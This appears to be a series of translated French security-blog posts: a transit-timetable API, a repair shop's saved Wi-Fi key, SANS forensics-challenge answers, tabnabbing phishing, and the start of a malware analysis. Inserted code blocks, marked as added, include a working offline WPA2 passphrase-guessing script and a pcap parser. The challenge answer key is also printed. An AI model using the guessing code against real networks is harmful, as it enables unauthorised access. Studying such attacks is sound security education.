</div><div><div style="text-align: justify;">- getDirections() returns the line number, the names of the termini, and the direction corresponding to each terminus</div></div><div style="text-align: justify;"><i>www.tcar.fr/WebServices/xgoatService/xLine/getDirections.asp?uId=TCAR01&ligID=6 </i>(example for the metro line)</div><div><br />
</div><div>- getStops() returns all the stops of a line</div><div><div><i>www.tcar.fr/WebServices/xgoatService/xLine/getLineStops.asp?uId=TCAR01&ligID=6&ligSens=1</i> (example for the metro line with the Technopôle stop as terminus)</div></div><div><br />
</div><div><div style="text-align: justify;">- getLineCode() returns several pieces of information, including the line code, which we will need later to retrieve the timetables</div></div><div><div><i>www.tcar.fr/WebServices/xgoatService/xLine/getLineInfos.asp?uId=TCAR01&ligID=6</i></div></div><div><br />
</div><div><div style="text-align: justify;">- callbackLineCode() selects the "carrier identifiers" of the line from the code returned by getLineCode(). This function only keeps the last two digits of the line code.</div><br />
<div style="text-align: justify;">- updateScheduleData() returns the times of all the metros, buses... passing after the current time (until the end of the day). Depending on the line, the times may or may not be updated in real time.</div><i>www.tcar.fr/SiriSoapClient/getStopTimetable.aspx?uId=INEO:Operator:Cityway:LOC&ligno=90&ptano=10126&sens=1</i> (real time)<br />
<i>www.tcar.fr/WebServices/xgoatService/xHour/getLineStopNextHours.asp </i><br />
<br />
</div><div><br />
<b><span class="Apple-style-span" style="font-size: x-large;">2 - Python script</span></b><br />
<br />
</div><div><div style="text-align: justify;">I wrote a small Python script to test the elements of the previous section. The script is not flexible at all, since it retrieves the time of the next metro heading to the south of Rouen and passing at the stop closest to my home. When the script has found the time of the next metro, text-to-speech announces its time and destination (works on Mac thanks to the "say" command).<br />
<br />
</div></div><div><iframe src="http://pastebin.com/embed_iframe.php?i=fBEqB1T6" style="border: none; height: 500px; width: 100%;"></iframe><br />
<br />
</div><div><div style="text-align: justify;">If everything goes well you should hear (on Mac) a sentence like this one: "Next subway is at 20 hours 45 minutes for Technopôle."</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">This article and this script do not let me check the next metro times from my phone as I would like, but they give me a better idea of how I could develop a widget or an application for Android (if I find the time).<br />
<br />
Update: there is a mobile-friendly website for checking the timetables, however you have to enter the name of the stop to get its times, which is not very convenient when you are not sure of the name, the spelling... </div></div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-83002263557728711542010-07-24T21:34:00.004+02:002010-07-24T22:09:31.928+02:00Getting access to a Wi-Fi network with little or no effort<div style="text-align: justify;">A few months ago, following a graphics card problem on my MacBook (yes, it has the infamous 8600M GT, victim of an overheating problem), I took it to an Apple-authorised repairer for a diagnosis. Luckily, the repair was free thanks to Apple acknowledging the problem with the Nvidia graphics cards. Anyway, that is hardly important, let's get to the "fun" part of the story.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2r1qyVQVq_ZOV_-XcPXNAcNTASSUOiW91nRr7AagYa19zeecwkgnHXaewo06k5EXR_GMySCHaHuxUSSEiPEW0HSpq3tmv9bD1qBsYYz7gTX4Y80mM9k0kxI0DrI5RDfQ5hGNFycfwTQ30/s1600/Screen+shot+2010-04-17+at+6.59.43+PM+2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2r1qyVQVq_ZOV_-XcPXNAcNTASSUOiW91nRr7AagYa19zeecwkgnHXaewo06k5EXR_GMySCHaHuxUSSEiPEW0HSpq3tmv9bD1qBsYYz7gTX4Y80mM9k0kxI0DrI5RDfQ5hGNFycfwTQ30/s320/Screen+shot+2010-04-17+at+6.59.43+PM+2.png" /></a>So, a few weeks after getting my Mac back, I went into the "Keychain Access" application bundled with Mac OS. It stores every password typed into applications that you do not want to re-enter each time, but also those of network shares (e.g. SMB servers...) and the keys of Wi-Fi access points. That is how I found the one used in the repair centre where my little MacBook had spent a few days.</div><br />
<br />
<br />
<br />
Some information about the key: it is ten characters long (letters and digits) and includes the repairer's name, which is not great security-wise (on top of typing that key on customers' computers...). I hope for their sake that they do not save their Wi-Fi network key on every computer they repair; otherwise they are really putting themselves at risk.<br />
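Why the content of that key matters more than its length: WPA2-Personal derives the pairwise master key from the passphrase with PBKDF2-HMAC-SHA1 (4096 iterations, salted with the SSID), and anyone who has captured one 4-way handshake can test candidates offline. A key shaped like "&lt;shop name&gt;&lt;digits&gt;" lives in a keyspace of a few hundred guesses, not 36^10. The Python below is an added example, not code from this post: the SSID, passphrase and business names are constructed, and it compares candidate PMKs against the PMK of the constructed passphrase rather than against a captured handshake MIC (same cost per guess). The derivation is checked against the IEEE 802.11 known-answer vector for "password"/"IEEE" before it is trusted.

```python
import hashlib
import hmac
import itertools
import string
from typing import Iterable, Iterator, List, Optional, Tuple

# Constructed sample: SSID, passphrase and business names are made up for this
# example; they are not the repairer's real network. The passphrase has the
# shape described above: ten letters/digits built from the business name.
SSID = b"ReparMac-Atelier"
PASSPHRASE = b"reparmac42"

# Known-answer vector from IEEE 802.11 Annex H: passphrase "password", SSID "IEEE".
KAT_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def wpa2_pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def self_test() -> bool:
    """Check the derivation against the published test vector before trusting any result."""
    return wpa2_pmk(b"password", b"IEEE").hex() == KAT_PMK_HEX


def name_mask_candidates(names: Iterable[str], suffix_len: int) -> Iterator[bytes]:
    """Yield '<name><digits>' in three casings, skipping lengths WPA2 does not allow (8..63)."""
    for name in names:
        for variant in dict.fromkeys((name.lower(), name.capitalize(), name.upper())):
            for digits in itertools.product(string.digits, repeat=suffix_len):
                cand = variant + "".join(digits)
                if 8 <= len(cand) <= 63:
                    yield cand.encode()


def mask_keyspace(names: List[str], max_suffix: int) -> int:
    """How many guesses the mask covers in total (compare with 36**10 for a random 10-char key)."""
    return sum(1 for n in range(max_suffix + 1) for _ in name_mask_candidates(names, n))


def recover_psk(target_pmk: bytes, ssid: bytes, names: List[str],
                max_suffix: int = 2) -> Tuple[Optional[str], int]:
    """Offline guess loop: returns (passphrase or None, PBKDF2 derivations spent).

    A real attack checks each candidate PMK against the MIC of a captured 4-way
    handshake (what aircrack-ng and hashcat do). Comparing against the PMK of the
    constructed passphrase, as done here to stay self-contained, costs the attacker
    exactly the same per guess: one PBKDF2 run of 4096 iterations.
    """
    tried = 0
    for n in range(max_suffix + 1):
        for cand in name_mask_candidates(names, n):
            tried += 1
            if hmac.compare_digest(wpa2_pmk(cand, ssid), target_pmk):
                return cand.decode(), tried
    return None, tried


if __name__ == "__main__":
    assert self_test()
    names = ["reparmac", "macrepair"]
    psk, tried = recover_psk(wpa2_pmk(PASSPHRASE, SSID), SSID, names)
    print(f"mask covers {mask_keyspace(names, 2)} candidates vs {36 ** 10} for a random 10-char key")
    print(f"recovered {psk!r} after {tried} derivations")
```

The 4096-iteration PBKDF2 is the only thing slowing the attacker down, and it is applied per guess, so a passphrase that needs a few hundred guesses is recovered in seconds on a laptop regardless of its ten-character length; a random passphrase of the same length would need on the order of 36^10 guesses.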
<div style="text-align: justify;"><br />
</div><div style="text-align: justify;">To conclude, one could ask whether, legally speaking, given that the key was (involuntarily) communicated to me, I have the right to use their network to access the Internet.<br />
<br />
</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-77869425693723511222010-07-10T11:03:00.002+02:002010-07-10T13:41:26.882+02:00Ann's Aurora, a digital forensics challenge from SANS<div style="text-align: justify;">In June, SANS put a <a class="vt-p" href="http://computer-forensics.sans.org/challenges/">challenge</a> on its website: a digital forensics investigation of a network traffic capture. It is not the first challenge SANS has organised, but according to them it was one of the most complicated.</div><div style="text-align: justify;">The goal was to answer a little more than 10 questions by analysing the file evidence06.pcap. In this capture only 2 machines interact with each other: one (10.10.10.70) is the victim of an attack similar to "<a class="vt-p" href="http://fr.wikipedia.org/wiki/Op%C3%A9ration_Aurora">Operation Aurora</a>" and the other (10.10.10.10) is the machine controlled by the attacker.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">If you want to do this challenge, do not read on before having searched for yourself, because I am going to give the answers and point out the mistakes I made.<br />
<br />
<br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">1) What was the full URI of Vick Timmes' original web request? (Please include the port in your URI.)</div><div style="text-align: justify;"><i>Answer : http://10.10.10.10:8080/index.php</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">2) In response, the malicious web server sent back obfuscated JavaScript. Near the beginning of this code, the attacker created an array with 1300 elements labeled "COMMENT", then filled their data element with a string. What was the value of this string?</div><div style="text-align: justify;"><i>Answer : vEI</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">3) Vick's computer made a second HTTP request for an object.</div><div style="text-align: justify;"> a) What was the filename of the object that was requested?</div><div style="text-align: justify;"><i>Answer : index.phpmfKSxSANkeTeNrah.gif</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> b) What is the MD5sum of the object that was returned?</div><div style="text-align: justify;"><i>Answer : df3e567d6f16d040326c7a0ea29a4f41</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">4) When was the TCP session on port 4444 opened? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)</div><div style="text-align: justify;"><i>Answer : 1.3 seconds</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">5) When was the TCP session on port 4444 closed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)</div><div style="text-align: justify;"><i>Answer : 87.6 seconds</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">6) In packet 17, the malicious server sent a file to the client.</div><div style="text-align: justify;"> a) What type of file was it? Choose one:</div><ul><li style="text-align: justify;">Windows executable</li>
<li style="text-align: justify;">GIF image</li>
<li style="text-align: justify;">PHP script</li>
<li style="text-align: justify;">Zip file</li>
<li style="text-align: justify;">Encrypted data</li>
</ul><div style="text-align: justify;"><i>Answer : Windows executable</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> b) What was the MD5sum of the file?</div><div style="text-align: justify;"><i>Answer : b062cb8344cd3e296d8868fbef289c7c</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">7) Vick's computer repeatedly tried to connect back to the malicious server on port 4445, even after the original connection on port 4444 was closed. With respect to these repeated failed connection attempts:</div><div style="text-align: justify;"> a) How often does the TCP initial sequence number (ISN) change? (Choose one.)</div><ul><li style="text-align: justify;">Every packet</li>
<li style="text-align: justify;">Every third packet</li>
<li style="text-align: justify;">Every 10-15 seconds</li>
<li style="text-align: justify;">Every 30-35 seconds</li>
<li style="text-align: justify;">Every 60 seconds</li>
</ul><div style="text-align: justify;"><i>Answer : Every third packet</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> b) How often does the IP ID change? (Choose one.)</div><ul><li style="text-align: justify;">Every packet</li>
<li style="text-align: justify;">Every third packet</li>
<li style="text-align: justify;">Every 10-15 seconds</li>
<li style="text-align: justify;">Every 30-35 seconds</li>
<li style="text-align: justify;">Every 60 seconds</li>
</ul><div style="text-align: justify;"><i>Answer : Every packet</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> c) How often does the source port change? (Choose one.)</div><ul><li style="text-align: justify;">Every packet</li>
<li style="text-align: justify;">Every third packet</li>
<li style="text-align: justify;">Every 10-15 seconds</li>
<li style="text-align: justify;">Every 30-35 seconds</li>
<li style="text-align: justify;">Every 60 seconds</li>
</ul><div style="text-align: justify;"><i>Answer : Every 10-15 seconds</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">8) Eventually, the malicious server responded and opened a new connection. When was the TCP connection on port 4445 first successfully completed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="text-align: justify;"><i>Answer : 123.7</i></div></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">9) Subsequently, the malicious server sent an executable file to the client on port 4445. What was the MD5 sum of this executable file?</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div style="text-align: justify;"><i>Answer : b062cb8344cd3e296d8868fbef289c7c</i></div></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">10) When was the TCP connection on port 4445 closed? (Provide the number of seconds since the beginning of the packet capture, rounded to tenths of a second. ie, 49.5 seconds)</div><div style="text-align: justify;"><i>Answer : 198.4</i></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">So I made 2 mistakes: one on question 2 and the other on question 7a. </div><div style="text-align: justify;">For the second question, I had given a string starting with "\u0c0f\u0c0d..." because at the beginning the array is indeed initialised with "vEI", but further down in the JavaScript code that string is replaced by the one I believed to be the right answer. </div><div style="text-align: justify;">As for question 7a, Wireshark showed me "Sequence number: 0 (relative sequence number)", which misled me. To find the correct sequence number I had to look at the packet in hexadecimal and convert the bytes corresponding to the sequence number to decimal. Another, more intuitive solution would have been to disable the "Relative sequence numbers and window scaling" option by right-clicking in the packet details pane and going to the "Protocol Preferences" submenu.</div><div style="text-align: justify;"><br />
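The relative-versus-absolute sequence number trap above disappears if you read the fields straight from the capture file. The Python below is an added example, not part of the original post or of the SANS challenge material: it builds a small pcap in memory with six constructed SYN retries that mimic the retry pattern asked about in question 7 (timings, ports, IP IDs and ISNs are made up, not values from evidence06.pcap), then parses it with the standard library only and reports the absolute ISN, IP ID and source port of every SYN to a given port, plus how often each field changes.

```python
import struct
from typing import Dict, List, Optional

PCAP_MAGIC = 0xA1B2C3D4          # classic little-endian pcap, microsecond timestamps
LINKTYPE_ETHERNET = 1


def _ip(dotted: str) -> bytes:
    return bytes(int(octet) for octet in dotted.split("."))


def build_syn(ts_sec: int, ts_usec: int, sport: int, ip_id: int, isn: int,
              src: str = "10.10.10.70", dst: str = "10.10.10.10", dport: int = 4445) -> bytes:
    """One pcap record holding an Ethernet/IPv4/TCP SYN (checksums left at zero; the parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, isn, 0, 5 << 4, 0x02, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ip_id, 0x4000, 128, 6, 0,
                     _ip(src), _ip(dst))
    eth = bytes.fromhex("000c29000001" "000c29000002" "0800")
    frame = eth + ip + tcp
    return struct.pack("<IIII", ts_sec, ts_usec, len(frame), len(frame)) + frame


def write_pcap(records: List[bytes]) -> bytes:
    header = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    return header + b"".join(records)


# Constructed sample: six SYNs from the "victim" to the "attacker" on port 4445.
# Three retransmissions keep the same ISN and source port, then a new connect()
# picks new ones; the IP ID increments on every packet. All values are made up.
SAMPLE_PCAP = write_pcap([
    build_syn(100, 0,      1038, 0x1001, 0x1A2B3C4D),
    build_syn(103, 0,      1038, 0x1002, 0x1A2B3C4D),
    build_syn(109, 0,      1038, 0x1003, 0x1A2B3C4D),
    build_syn(121, 500000, 1039, 0x1004, 0x5E6F7081),
    build_syn(124, 500000, 1039, 0x1005, 0x5E6F7081),
    build_syn(130, 500000, 1039, 0x1006, 0x5E6F7081),
])


def syn_summary(pcap: bytes, dport: int) -> List[Dict[str, object]]:
    """Absolute ISN, IP ID, source port and relative time of every SYN (no ACK) sent to `dport`."""
    (magic,) = struct.unpack_from("<I", pcap, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("only little-endian classic pcap is handled here")
    rows, t0, off = [], None, 24
    while off + 16 <= len(pcap):
        ts_sec, ts_usec, incl_len, _ = struct.unpack_from("<IIII", pcap, off)
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                  # not IPv4 over Ethernet
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != 6:
            continue                                  # not TCP
        (ip_id,) = struct.unpack_from("!H", ip, 4)
        tcp = ip[ihl:]
        if len(tcp) < 20:
            continue
        sport, tdport, seq = struct.unpack_from("!HHI", tcp, 0)
        if tdport != dport or (tcp[13] & 0x12) != 0x02:
            continue                                  # keep SYN without ACK only
        t = ts_sec + ts_usec / 1e6
        t0 = t if t0 is None else t0
        rows.append({"t": round(t - t0, 1), "sport": sport, "ip_id": ip_id, "isn": seq})
    return rows


def changes_every(rows: List[Dict[str, object]], key: str) -> Optional[int]:
    """Run length between changes of `key` (3 means 'every third packet'); None if never or uneven."""
    runs, run = [], 1
    for prev, cur in zip(rows, rows[1:]):
        if cur[key] == prev[key]:
            run += 1
        else:
            runs.append(run)
            run = 1
    if not runs:
        return None
    return runs[0] if all(r == runs[0] for r in runs) else None


if __name__ == "__main__":
    rows = syn_summary(SAMPLE_PCAP, 4445)
    for r in rows:
        print(f"t={r['t']:>5}s sport={r['sport']} ip_id=0x{r['ip_id']:04x} isn=0x{r['isn']:08x}")
    for key in ("isn", "ip_id", "sport"):
        print(key, "changes every", changes_every(rows, key), "packet(s)")
```

Pointing `syn_summary` at the real evidence06.pcap (read the file into `bytes`) gives the raw 32-bit ISN that Wireshark hides behind "relative sequence number"; the same loop also answers the timing questions, since `t` is measured from the first matching packet rather than from the capture start, which you would change by taking `t0` from the first record of the file.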
</div><div style="text-align: justify;">I found this little challenge very interesting and I hope others will follow, so that this time I make it into the finalists :)</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Post announcing the challenge winners: <a class="vt-p" href="http://forensicscontest.com/2010/07/09/puzzle-6-winners">http://forensicscontest.com/2010/07/09/puzzle-6-winners</a></div><div style="text-align: left;">Winner's solution: <a class="vt-p" href="http://forensicscontest.com/contest06/Finalists/Wesley_McGrew/narrative.txt">http://forensicscontest.com/contest06/Finalists/Wesley_McGrew/narrative.txt</a></div><div style="text-align: left;">Another interesting solution: <a class="vt-p" href="http://chatteronthewire.blogspot.com/2010/06/forensic-contest-6-answer.html">http://chatteronthewire.blogspot.com/2010/06/forensic-contest-6-answer.html</a></div><div style="text-align: left;"><br />
</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-62651890991102577752010-06-17T23:35:00.002+02:002010-07-24T22:08:27.397+02:00OpenOffice in firewall mode: OOwall<div style="text-align: justify;">In early April 2009, while the Hadopi bill was being drafted, Christine Albanel, our (former) Minister of Culture, told us that her ministry was protected by the OpenOffice firewall. At the time this created a big buzz on the net, because millions of people use the OpenOffice office suite, but nobody knew how to use it as a firewall (apart from Christine).</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><object height="360" width="480"><param name="movie" value="http://www.dailymotion.com/swf/video/x8ury3"></param><param name="allowFullScreen" value="true"></param><param name="allowScriptAccess" value="always"></param><embed type="application/x-shockwave-flash" src="http://www.dailymotion.com/swf/video/x8ury3" width="480" height="360" allowfullscreen="true" allowscriptaccess="always"></embed></object></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Since yesterday, the technique used by the Ministry of Culture (joke inside) has been revealed by Pierre Chifflier (aka Pollux), a French security expert.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">To run this next-gen firewall, you need:</div><div style="text-align: justify;">- OpenOffice, which lets you choose the ports to filter and generates real-time charts summarising blocked and allowed packets</div><div style="text-align: justify;">- python-uno to drive OpenOffice</div><div style="text-align: justify;">- nfqueue to filter packets from a high-level language</div><div style="text-align: justify;">- netfilter</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Below, a diagram showing the relationships between the components of this firewall:</div><div class="separator" style="clear: both; text-align: justify;"><a class="vt-p" href="http://www.wzdftpd.net/blog/images/design_oowall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://www.wzdftpd.net/blog/images/design_oowall.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: justify;">On the diagram you can see an XML-RPC client-server link: it lets the tools of the "firewall" part, which run as root, talk to the administration console without the console itself having to run as root.</div><div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;">Below, a preview of the OpenOffice firewall's "administration" interface:</div><div class="separator" style="clear: both; text-align: left;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><a class="vt-p" href="http://www.wzdftpd.net/blog/images/oowall_02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://www.wzdftpd.net/blog/images/oowall_02.png" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;">For more information and to download the OOwall sources, head over to <a class="vt-p" href="http://www.wzdftpd.net/blog/index.php?2010/06/16/46-le-pare-feu-openoffice">Pollux's blog</a>.</div><div class="separator" style="clear: both; text-align: justify;"><br />
</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-37678917093196962702010-05-27T23:06:00.005+02:002010-07-24T22:08:38.204+02:00Tabnabbing, the future of phishing attacks<div style="text-align: justify;">Aza Raskin has discovered a new kind of phishing attack that deceives a user who browses the attacker's website and then goes to look at another website in another tab. It also works if the user uses multiple browser windows, but it is less stealthy. This attack works on all browsers (there is a small bug with the favicon on Safari).</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Tabnabbing is very simple to understand and implement. When the user browses the attacker's website, a piece of JavaScript runs and waits for the user to move to another tab (without closing the first one). Once the attacker's tab has lost focus for more than 5 seconds, that JavaScript swaps the favicon, title and content of the attacker's page. There is little chance the user notices the title and favicon changing, because he is busy with the second website. When he comes back to the first tab he sees the "new page", which can look just like his webmail login, and if he logs in, the attacker gets his credentials.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">If you want to test it, go <a class="vt-p" href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/">here</a> or watch his proof of concept on video:<br />
<br />
</div><div style="text-align: justify;"><object height="267" width="400"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=12003099&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=12003099&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="267"></embed></object></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">This new phishing attack can be improved with <a class="vt-p" href="http://www.azarask.in/blog/post/socialhistoryjs/">another</a> technique (using JavaScript and CSS) that reveals some of the websites the user has visited before, so the fake page can impersonate a site the victim actually uses.</div><br />
<br />
Raskin's article: <a class="vt-p" href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/">http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/</a><br />
His Wikipedia page: <a class="vt-p" href="http://en.wikipedia.org/wiki/Aza_Raskin">http://en.wikipedia.org/wiki/Aza_Raskin</a><br />
His Twitter: <a class="vt-p" href="http://twitter.com/azaaza">http://twitter.com/azaaza</a><br />
PoC: <a class="vt-p" href="http://www.azarask.in/projects/bgattack.js">http://www.azarask.in/projects/bgattack.js</a>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-12722991144148890992010-05-11T19:31:00.008+02:002010-07-24T22:08:55.506+02:00Behavioural analysis of a piece of malware<div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </b><br />
<b><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-size: x-large;">1 - Setting the scene</span></span></b></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">For a few days now, when I connect to MSN with my favourite instant messaging client (Adium :)), I have been receiving messages from one of my contacts inviting me to look at photos. I think you have already received this kind of message, because unfortunately many people fall for it and click on these links. Since this kind of message annoys me, I wanted to take a closer look at how it works and why so many people get infected by this type of malware, which spreads through instant messaging clients such as MSN.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">In the case of this malware, I received through my contact several messages of the form "</span><i><span class="Apple-style-span" style="font-family: inherit;">regardez cette photo :D http://tinyurl.com/###</span></i><span class="Apple-style-span" style="font-family: inherit;">" ("look at this photo :D"), where ### varies from one message to the next. These links were quickly identified as an illegal use of the TinyURL service and are no longer active. The 2 TinyURL links I tested redirected to different URLs and therefore offered different files for download: one named IMAGE.JPG.exe and the other pict20100501_jpg.scr (the Windows screensaver format). Both files are hosted on the same server, located in the United Kingdom.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-KWJESaHzK1Ad8vMRlsEB_fSRZ0QFbEKL973r4LNSaNjMZW7goR8ngL5BG7Ez9v8UUsft06YQ1hbct927IQO8-AA0CaKhqjoekKtu04HlqiVilRD4An1mueC3QHWtZiFbkvMrkoTm_VZE/s1600/file_icones.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-KWJESaHzK1Ad8vMRlsEB_fSRZ0QFbEKL973r4LNSaNjMZW7goR8ngL5BG7Ez9v8UUsft06YQ1hbct927IQO8-AA0CaKhqjoekKtu04HlqiVilRD4An1mueC3QHWtZiFbkvMrkoTm_VZE/s320/file_icones.png" /></span></a></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Note that the malware author tries to fool the user about the real type of the file. For example, the first one is named IMAGE.JPG.exe, which shows up as IMAGE.JPG when Windows hides file extensions (the default), so the user believes it is a real image and opens it without thinking. For the second file, the icon used is the same as that of JPEG images and, as with the first file, the author plays on the file name, giving a file that visually looks very much like a real image. However, I do not understand why the author did not use the JPEG icon for the executable file, nor why he ended the second file's name with _jpg.scr rather than .jpg.scr, which would fool the victim more easily...</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><i><span class="Apple-style-span" style="font-family: inherit;">A small tip: if you receive a message written in English from a French person (or someone who does not speak English), or if the message addresses you formally ("vous") whereas it comes from a close contact who usually addresses you informally ("tu"), as is the case here, there is a good chance that the message comes from malware.</span></i></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><div style="text-align: left;"><b><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-size: x-large;">2 - Behavioural analysis of the malware</span></span></b></div></div><div style="text-align: justify;"><div style="text-align: left;"><b><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </b></div></div></div><div><div style="text-align: justify;"><div style="text-align: left;"><b><span class="Apple-style-span" style="font-family: inherit;">2.1 - On the file system</span></b></div></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">To understand how this malware works, I used a basic Windows XP SP2 Professional (without updates) in a virtual machine (VMware Fusion), so as to keep the risk posed by this malicious software easily under control. VMware also lets you take snapshots, which is very convenient for switching between several "states" of the VM.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">I started by observing what the malware does when it is launched. Armed with tools such as Regshot and CaptureBAT, I could see that the malware modifies the Windows registry and creates the file </span><i><span class="Apple-style-span" style="font-family: inherit;">C:\WINDOWS\secfil.exe</span></i><span class="Apple-style-span" style="font-family: inherit;">. This file is invisible in explorer.exe (even with hidden files shown) and in the cmd.exe command interpreter, but tab completion in cmd.exe reveals its presence. It can also be reached from a Linux live CD such as Backtrack.</span><br />
<br />
